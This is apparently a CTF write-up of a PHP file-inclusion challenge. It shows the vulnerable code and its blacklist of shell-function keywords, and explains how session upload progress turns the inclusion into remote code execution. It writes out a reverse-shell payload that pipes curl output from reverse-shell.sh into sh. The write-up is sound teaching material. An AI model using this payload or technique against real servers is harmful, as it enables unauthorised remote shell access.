[SEC Playground: Half Year CTF 2024] - Upload your choice

KeqingsmellgoodKeqingsmellgood
2 min read

Table of contents

Introduction

PHP Source Code Breakdown

    <?php
        function sanitize($s) {
            if(stripos($s,"log") or stripos($s,"etc") or stripos($s,"access") or stripos($s,"error") or stripos($s,"encode") or stripos($s,"http") or stripos($s,"popen") or stripos($s,"data") or stripos($s,"input") or stripos($s,"expect") or stripos($s,"../") or stripos($s,"phpinfo") or stripos($s,"system") or stripos($s,"exec") or stripos($s,"shell_exec") or stripos($s,"passthru") or stripos($s,"proc") or stripos($s,"flag") or stripos($s,"convert.iconv"))
            {
                die("Your input was denied");
            }
            return $s;
        }

        ini_set('session.upload_progress.cleanup', 'Off');
        ini_set('allow_url_include', 'Off');
        if(isset($_GET['spg']))
        {

            $spg=sanitize($_GET['spg']);
            $target=@$spg;
            if(substr(file($target)[0],0,17) === '<?php echo "spg";')
                include($target);
        }
    ?>

  1. Web apps receive user input via the "spg" GET parameter.

  2. Web apps pass this user input to the sanitize function.

  3. The sanitize function checks for blacklisted words.

log
etc
access
error
encode
http
popen
data
input
expect
../
phpinfo
system
exec
shell_exec
passthru
proc
flag
convert.iconv

  1. Web apps check that the first 17 characters of the string must contain <?php echo "spg";.

  2. If the user input passes all the conditions above, the web apps will include the file path from the user input.

Flag retrieval: Exploit and gain reverse-shell

session.upload_progress.cleanup set to off

https://book.hacktricks.xyz/pentesting-web/file-inclusion/via-php_session_upload_progress

https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py

Crafting exploit script and gain revere-shell

Change line 12 to any strings. Then change line 19 to match challenge condition.

  1. The payload must be start with <?php echo "spg";

  2. the payload should not contain blacklist word.

I use https://reverse-shell.sh to automated reverse shell callback.

For example, If open netcat listener as 192.168.1.1 port 80

The payload will be curl https://reverse-shell.sh/192.168.1.1:80 | sh

Change line 45 and 48 to match challenge parameter. In this case the web apps receive input via HTTP Get with "spg" parameter.

Execute script with argument 1 as below.

python2 exe.py 1

0
Subscribe to my newsletter

Read articles from Keqingsmellgood directly inside your inbox. Subscribe to the newsletter, and don't miss out.

LFI2RCECTF WriteupSECPlaygroundweb applicationPHP

Written by

Keqingsmellgood
Keqingsmellgood